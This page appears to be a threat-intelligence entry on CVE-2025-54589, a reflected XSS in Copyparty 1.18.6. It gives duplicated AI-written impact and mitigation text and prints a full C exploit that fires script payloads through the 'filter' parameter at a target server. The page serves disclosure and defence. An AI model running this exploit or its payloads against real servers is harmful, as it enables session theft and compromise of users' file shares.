Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
AI Analysis
Technical Summary
The identified security threat pertains to a Reflected Cross-Site Scripting (XSS) vulnerability in Copyparty version 1.18.6. Copyparty is a web-based file sharing application that allows users to share files over HTTP without requiring installation or complex configuration. The reflected XSS vulnerability arises when user-supplied input is improperly sanitized and then immediately echoed back in the HTTP response, enabling an attacker to inject malicious scripts into the victim's browser. This type of vulnerability can be exploited by crafting a specially crafted URL containing malicious JavaScript code. When a user clicks on this URL, the injected script executes in the context of the victim's browser session with Copyparty, potentially leading to session hijacking, theft of cookies, defacement, or redirection to malicious sites. The exploit code is available and written in the C programming language, indicating that the vulnerability can be reliably triggered using a crafted client or automated tool. Although no specific affected versions are listed beyond 1.18.6, the vulnerability is confirmed in this release. There is no mention of a patch or mitigation from the vendor at this time. The vulnerability does not require authentication or user privileges, but it does require user interaction in the form of clicking a malicious link. The lack of a CVSS score necessitates an independent severity assessment based on the impact and exploitability factors.
Potential Impact
For European organizations using Copyparty 1.18.6, the reflected XSS vulnerability poses a moderate risk primarily to confidentiality and integrity of user sessions. Attackers can leverage this vulnerability to steal session cookies or credentials, potentially gaining unauthorized access to shared files or administrative functions if sessions are compromised. This can lead to data leakage, unauthorized file access, or manipulation of shared content. The impact on availability is limited, as XSS typically does not disrupt service operation directly. However, successful exploitation could erode user trust and lead to reputational damage, especially for organizations handling sensitive or regulated data under GDPR. Since Copyparty is often used in small to medium enterprises or by individuals for file sharing, the scale of impact depends on deployment scope. European organizations with public-facing Copyparty instances are at risk, particularly if users are not trained to recognize phishing or malicious links. The absence of known exploits in the wild currently reduces immediate risk but does not preclude future attacks.
Mitigation Recommendations
To mitigate this reflected XSS vulnerability, European organizations should first verify if they are running Copyparty version 1.18.6 and plan an immediate upgrade once a patched version is released. In the interim, organizations should implement web application firewall (WAF) rules to detect and block suspicious input patterns commonly used in XSS attacks. Input validation and output encoding should be enforced at the application level to sanitize user inputs and prevent script injection. Organizations should also educate users about the risks of clicking on unsolicited or suspicious links, especially those purporting to lead to file shares. Employing Content Security Policy (CSP) headers can help restrict the execution of unauthorized scripts in browsers. Additionally, monitoring logs for unusual URL requests and anomalous user behavior can help detect exploitation attempts early. If feasible, restricting access to Copyparty instances via VPN or IP whitelisting can reduce exposure to external attackers.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain, Poland
Indicators of Compromise
- exploit-code: /* * Author : Byte Reaper * CVE : CVE-2025-54589 * Title : Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) * CVE-2025-54589 is a reflected cross-site scripting (XSS) vulnerability in Copyparty (≤ 1.18.6) where the filter parameter is inserted into the HTML response without proper sanitization, allowing an attacker to inject and execute arbitrary JavaScript in a victim’s browser */ #include <curl/urlapi.h> #include <netinet/in.h> #include <stdio.h> #include <string.h> #include <curl/curl.h> #include "argparse.h" #include <stdlib.h> #include <arpa/inet.h> #include <stdarg.h> #include <unistd.h> #define FULL_URL 2500 #define COLOR_RESET "\e[0m" #define COLOR_RED "\e[1;31m" #define COLOR_GRN "\e[1;32m" #define COLOR_YEL "\e[1;33m" #define COLOR_BLU "\e[1;34m" #define COLOR_CYN "\e[1;36m" #define COLOR_WHT "\e[1;37m" #define COLOR_PUR "\e[1;35m" #define PRINT_OK(fmt, ...) print_color(COLOR_GRN, "" fmt, ##__VA_ARGS__) #define PRINT_ERR(fmt, ...) print_color(COLOR_RED, "" fmt, ##__VA_ARGS__) #define PRINT_WARN(fmt, ...) print_color(COLOR_YEL, "" fmt, ##__VA_ARGS__) #define PRINT_INFO(fmt, ...) print_color(COLOR_BLU, "" fmt, ##__VA_ARGS__) #define PRINT_NOTE(fmt, ...) print_color(COLOR_CYN, "" fmt, ##__VA_ARGS__) int verbose = 0; int useC = 0; const char *ipT = NULL; int portT = 0; const char *cookies = NULL; const char *caFile = NULL; int sCa = 0; int useColor = 1; int useHttp = 0; void print_color(const char *color, const char *fmt, ...) { va_list args; va_start(args, fmt); if (useColor) { printf("%s", color); } vprintf(fmt, args); if (useColor) { printf("%s", COLOR_RESET); } va_end(args); } void exitAssembly() { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $231, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { PRINT_ERR("[-] Failed to allocate memory!\n"); exitAssembly(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } const char *payloadXss[] = { "</script><script>alert(1)</script>", "<script\x09type=\"text/javascript\">javascript:alert(XSS);</script>", "<script\x0Ctype=\"text/javascript\">javascript:alert(byte);</script>" }; int number = sizeof(payloadXss) / sizeof(payloadXss[0]); const char *wordF[] = { "Error", "Exception", "Invalid", "XSS", "<script>", "</script>", "alert(1)", "syntax", "unexpected", "undefined", "NaN", "stack trace", "TypeError", "ReferenceError", "Warning", "Access denied", "eval(", "byte", }; int numberW = sizeof(wordF) / sizeof(wordF[0]); void auto_detect_color() { if (!isatty(fileno(stdout))) { useColor = 0; } } void senR(const char *ip, int port) { char full[FULL_URL]; CURLcode res ; CURL *curl = curl_easy_init(); struct Mem response ; response.buffer= NULL; response.len = 0; for (int h = 0; h < number ; h++) { if (!curl) { PRINT_ERR("[-] Error Create Object Curl !\n"); PRINT_ERR("[-] Check Your Connection\n"); exitAssembly(); } if (verbose) { PRINT_OK("==========================================\n"); PRINT_OK("[1;33m[+] Cleaning Response...\n"); PRINT_OK("[1;33m[+] Response Buffer : NULL\n"); PRINT_OK("[1;33m[+] Response Len : 0\n"); PRINT_OK("==========================================\n"); } if (curl) { char *payloadE = curl_easy_escape(curl, payloadXss[h], 0); struct curl_slist *headers = NULL; if (!payloadE) { PRINT_ERR("[-] Error Encode Payload !\e[0m\n"); curl_slist_free_all(headers); curl_easy_cleanup(curl); exitAssembly(); } const char *proto = useHttp ? "http" : "https"; int len1 = snprintf(full, sizeof(full), "%s://%s:%d/?filter=%s", proto, ip, port, payloadE); if (len1 >= sizeof(full)) { PRINT_ERR("[-] URL too long\n"); exitAssembly(); } PRINT_INFO("[+] Encode Payload : %s\n", payloadXss[h]); PRINT_INFO("[+] Encode Payload Successfully.\n"); PRINT_INFO("[+] Payload Encode : %s\n", payloadE); PRINT_INFO("[+] target IP : %s\n", ip); printf("[+] Full Url : %s\n", full); printf("[+] Port : %d\n", port); curl_easy_setopt(curl, CURLOPT_URL, full); curl_free(payloadE); if (useC) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); usleep(1500000); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); if (sCa) { curl_easy_setopt(curl, CURLOPT_CAINFO, caFile); } else { curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); } headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); char refR[120]; int lenF = snprintf(refR, sizeof(refR), "Referer: http://%s:%d", ip, port); if (lenF < 0 || (size_t)lenF >= sizeof(refR)) { PRINT_ERR("[-] Len Header Referer is Long ! \n"); response.buffer = NULL; response.len = 0; curl_slist_free_all(headers); curl_easy_cleanup(curl); exitAssembly(); } headers = curl_slist_append(headers, refR); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); if (verbose) { PRINT_OK("------------------------------------------[Verbose Curl]------------------------------------------\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } res = curl_easy_perform(curl); curl_slist_free_all(headers); if (res == CURLE_OK) { PRINT_OK("-----------------------------------------------------------------\n"); long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); PRINT_INFO("[+] Request sent successfully\e[0m\n"); PRINT_OK("[+] Http Code -> %ld\e[0m\n", httpCode); FILE *log = fopen("results.txt", "a"); if (log == NULL) { PRINT_ERR("[-] Error Create File !\n"); exitAssembly(); } if (log) { fprintf(log, "[+] Target: %s:%d | Payload: %s\n", ip, port, payloadXss[h]); fprintf(log, "[+] Response : \n%s\n", response.buffer); fclose(log); } if (httpCode >= 200 && httpCode < 300) { PRINT_OK("[+] Http Code (200 < 300) : %ld\n",httpCode); for (int s = 0; s < numberW ; s++) { if (strstr(response.buffer, wordF[s]) != NULL) { PRINT_INFO("[+] A suspicious word was found in the server's response !!\n"); PRINT_INFO("[+] Word Found : %s\n", wordF[s]); PRINT_NOTE("[+] The vulnerability CVE-2025-54589 exists on the server\n"); PRINT_OK("\n======================================== [Response Server] ========================================\n"); printf("%s\n", response.buffer); printf("[Len] : %zu\n", response.len); PRINT_OK("\n==================================================================================================\n"); } } } else { PRINT_ERR("[-] HTTP Code Not Range Positive (200 < 300) : %ld\n", httpCode); PRINT_ERR("[+] Try Next Payload : %s\e[0m\n", payloadXss[h]); } } else { PRINT_ERR("[-] Error Send Request\n"); PRINT_ERR("[-] Error : %s\e[0m\n", curl_easy_strerror(res)); exitAssembly(); } } } if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } curl_easy_cleanup(curl); } int main(int argc, const char **argv) { curl_global_init(CURL_GLOBAL_DEFAULT); printf( "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▖▖▄▖▄▖▄▖\n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▙▌▙▖▙▌▙▌\n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▄▌ ▌▄▌▙▌▄▌\n" "Byte Reaper\n" ); int noColor = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('i', "ip", &ipT, "Target IP "), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_INTEGER('p', "port", &portT, "Enter Target Port"), OPT_STRING('a', "ca" , &caFile, "Enter Name File CA\n"), OPT_BOOLEAN('t', "http", &useHttp, "HTTP Protocol"), OPT_BOOLEAN('n', "no-color", &noColor, "Disable colored output"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (ipT == NULL) { PRINT_ERR("[-] Please Enter Target Ip And Port !\n"); PRINT_ERR("[-] Ex : ./exploit -i <IP> -p <PORT>\n"); PRINT_ERR("[-] Exit Syscall\n"); curl_global_cleanup(); exitAssembly(); }; printf("---------------------------------------------------------------------\n\n"); printf("[+] Start Exploit XSS (CVE-2025-54589)...\n"); if (cookies) { useC = 1; } if (verbose) { verbose = 1; } if (!portT) { printf("[+] Default Port : %d\n", 3923); portT = 3923; } if (caFile) { sCa = 1; } if (useColor) { useColor = 1; } if (noColor) { useColor = 0; } if (useHttp) { useHttp = 1; } auto_detect_color(); senR(ipT, portT); curl_global_cleanup(); return 0; }
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
Description
Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
AI-Powered Analysis
Technical Analysis
The identified security threat pertains to a Reflected Cross-Site Scripting (XSS) vulnerability in Copyparty version 1.18.6. Copyparty is a web-based file sharing application that allows users to share files over HTTP without requiring installation or complex configuration. The reflected XSS vulnerability arises when user-supplied input is improperly sanitized and then immediately echoed back in the HTTP response, enabling an attacker to inject malicious scripts into the victim's browser. This type of vulnerability can be exploited by crafting a specially crafted URL containing malicious JavaScript code. When a user clicks on this URL, the injected script executes in the context of the victim's browser session with Copyparty, potentially leading to session hijacking, theft of cookies, defacement, or redirection to malicious sites. The exploit code is available and written in the C programming language, indicating that the vulnerability can be reliably triggered using a crafted client or automated tool. Although no specific affected versions are listed beyond 1.18.6, the vulnerability is confirmed in this release. There is no mention of a patch or mitigation from the vendor at this time. The vulnerability does not require authentication or user privileges, but it does require user interaction in the form of clicking a malicious link. The lack of a CVSS score necessitates an independent severity assessment based on the impact and exploitability factors.
Potential Impact
For European organizations using Copyparty 1.18.6, the reflected XSS vulnerability poses a moderate risk primarily to confidentiality and integrity of user sessions. Attackers can leverage this vulnerability to steal session cookies or credentials, potentially gaining unauthorized access to shared files or administrative functions if sessions are compromised. This can lead to data leakage, unauthorized file access, or manipulation of shared content. The impact on availability is limited, as XSS typically does not disrupt service operation directly. However, successful exploitation could erode user trust and lead to reputational damage, especially for organizations handling sensitive or regulated data under GDPR. Since Copyparty is often used in small to medium enterprises or by individuals for file sharing, the scale of impact depends on deployment scope. European organizations with public-facing Copyparty instances are at risk, particularly if users are not trained to recognize phishing or malicious links. The absence of known exploits in the wild currently reduces immediate risk but does not preclude future attacks.
Mitigation Recommendations
To mitigate this reflected XSS vulnerability, European organizations should first verify if they are running Copyparty version 1.18.6 and plan an immediate upgrade once a patched version is released. In the interim, organizations should implement web application firewall (WAF) rules to detect and block suspicious input patterns commonly used in XSS attacks. Input validation and output encoding should be enforced at the application level to sanitize user inputs and prevent script injection. Organizations should also educate users about the risks of clicking on unsolicited or suspicious links, especially those purporting to lead to file shares. Employing Content Security Policy (CSP) headers can help restrict the execution of unauthorized scripts in browsers. Additionally, monitoring logs for unusual URL requests and anomalous user behavior can help detect exploitation attempts early. If feasible, restricting access to Copyparty instances via VPN or IP whitelisting can reduce exposure to external attackers.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52390
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS)
/* * Author : Byte Reaper * CVE : CVE-2025-54589 * Title : Copyparty 1.18.6 - Reflected Cross-Site Scripting (XSS) * CVE-2025-54589 is a reflected cross-site scripting (XSS) vulnerability in Copyparty (≤ 1.18.6) where the filter parameter is inserted into the HTML response without proper sanitization, allowing an attacker to inject and execute arbitrary JavaScript in a victim’s browser */ #include <curl/urlapi.h> #include <netinet/in.h> #include <stdio.h> #include <string.h... (12479 more characters)
Threat ID: 68900844ad5a09ad00dd9e01
Added to database: 8/4/2025, 1:09:24 AM
Last enriched: 10/4/2025, 12:54:08 AM
Last updated: 10/7/2025, 8:49:13 PM
Views: 44
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Clop exploited Oracle zero-day for data theft since early August
CriticalExploit Against FreePBX (CVE-2025-57819) with code execution., (Tue, Oct 7th)
LowMedusa Ransomware Exploiting GoAnywhere MFT Flaw, Confirms Microsoft
MediumFortra GoAnywhere MFT Zero-Day Exploited in Ransomware Attacks
MediumU.S. CISA adds Oracle, Mozilla, Microsoft Windows, Linux Kernel, and Microsoft IE flaws to its Known Exploited Vulnerabilities catalog
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.